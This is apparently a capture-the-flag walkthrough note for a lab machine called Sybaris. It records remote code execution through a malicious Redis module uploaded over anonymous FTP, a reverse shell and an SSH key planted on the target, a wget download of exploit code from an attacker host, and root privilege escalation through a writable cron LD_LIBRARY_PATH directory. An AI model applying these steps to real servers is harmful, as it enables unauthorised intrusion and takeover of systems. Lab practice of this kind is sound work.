Malleum Knowledge Base

Sybaris

2 min read

redis is running on port 6379

Using https://book.hacktricks.xyz/pentesting/6379-pentesting-redis#load-redis-module

clone repo, make

FTP anonymous

need to upload the module.so

we can use ftp to upload

Uploaded module.so on ftp pub/

Default path is /var/ftp

Using redis-cli

192.168.224.93:6379> module load /var/ftp/pub/module.so

192.168.224.93:6379> modue list

(error) ERR unknown command `modue`, with args beginning with: `list`,

192.168.224.93:6379> module list

1) 1) "name"

2) "system"

3) "ver"

4) (integer) 1

192.168.224.93:6379> system.exec "whoami;id;hostname;uname -a"

"pablo\nuid=1000(pablo) gid=1000(pablo) groups=1000(pablo)\nsybaris\nLinux sybaris 3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux\n"

192.168.224.93:6379>

192.168.224.93:6379> system.exec "mkdir /home/pablo/.ssh"

192.168.224.93:6379> system.exec 'echo "ssh-rsa <<id_rsa.pub>> > /home/pablo/.ssh/authorized_keys'

[OR]

192.168.224.93:6379> system.rev 192.168.45.225 80

Priv esc

python -c 'import pty; pty.spawn("/bin/bash")'

Enumeration


Writable files outside user's home

/var/tmp
/var/log/redis
/var/log/redis/redis-server.log
/var/spool/mail/pablo
/var/ftp/pub
/var/ftp/pub/module.so
/tmp
/tmp/.X11-unix
/tmp/.font-unix
/tmp/.XIM-unix
/tmp/.Test-unix
/tmp/.ICE-unix
/tmp/lse.sh
/usr/local/lib/dev


[*] sec010 List files with capabilities.................................... yes!
---
/usr/bin/newgidmap = cap_setgid+ep
/usr/bin/newuidmap = cap_setuid+ep
/usr/bin/ping = cap_net_admin,cap_net_raw+p
/usr/sbin/arping = cap_net_raw+p
/usr/sbin/clockdiff = cap_net_raw+p
/usr/sbin/suexec = cap_setgid,cap_setuid+ep


/etc/crontab:SHELL=/bin/bash
/etc/crontab:PATH=/sbin:/bin:/usr/sbin:/usr/bin
**/etc/crontab:LD_LIBRARY_PATH=/usr/lib:/usr/lib64:/usr/local/lib/dev:/usr/l**ocal/lib/utils
/etc/crontab:MAILTO=""
/etc/crontab:  *  *  *  *  * root       /usr/bin/log-sweeper
/etc/cron.d/0hourly:SHELL=/bin/bash
/etc/cron.d/0hourly:PATH=/sbin:/bin:/usr/sbin:/usr/bin
/etc/cron.d/0hourly:MAILTO=root
/etc/cron.d/0hourly:01 * * * * root run-parts /etc/cron.hourly
---

[!] ret060 Can we write to executable paths present in cron jobs........... yes!
---
/etc/crontab:LD_LIBRARY_PATH=/usr/lib:/usr/lib64:/usr/local/lib/dev:/usr/local/lib/utils



export LD_LIBRARY_PATH=/usr/lib:/usr/lib64:/usr/local/lib/dev:/usr/l**ocal/lib/utils

─(jay㉿localhost)-[/opt/Tools/linux_tools/sudo]

wget http://192.168.45.225:22/test.c

gcc -o utils.so -shared -fPIC test.c

./rootbash -p

594807f3ba85ee342ed58e410ddc1d17
774046bc3830d36dd952f433be656831

Graph View